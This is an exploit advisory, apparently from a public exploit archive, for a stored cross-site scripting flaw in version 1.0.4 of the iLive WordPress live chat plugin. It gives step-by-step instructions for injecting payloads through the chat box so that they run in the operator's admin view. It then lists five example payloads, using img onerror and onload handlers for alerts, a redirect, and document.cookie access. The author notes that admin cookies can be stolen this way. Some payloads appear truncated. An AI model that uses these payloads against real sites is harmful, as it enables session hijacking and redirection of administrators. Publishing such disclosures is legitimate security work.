# Exploit Title: iLive - Intelligent WordPress Live Chat Support
Plugin v1.0.4 Stored XSS Injection
# Google Dork: -
# Date: 2019/06/25
# Exploit Author: m0ze
# Vendor Homepage:
# Software Link:
# Version: 1.0.4
# Tested on: Windows 10 / Parrot OS
# CVE : -


Weak security measures like bad textarea data filtering has been
discovered in the «iLive - Intelligent WordPress Live Chat Support
Plugin». Current version of this premium WordPress plugin is 1.0.4.

Go to the demo website and open chat window by clicking on «Chat» icon on the bottom right corner. 
Use your payload inside input field and press [Enter]. 
Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other website.
To check your XSS Injections log in and go to this page then select your chat alias from the list. Keep in mind that there is 3 demo operators, so you must log in as operator assigned to your chat (operator number will be available after you send the first message in chat).

Example #1: <img src= onload=alert(`m0ze`);>
Example #2: <img src=
Example #3: <img src=x onerror=window.location.replace('');>
Example #4: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
Example #5: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">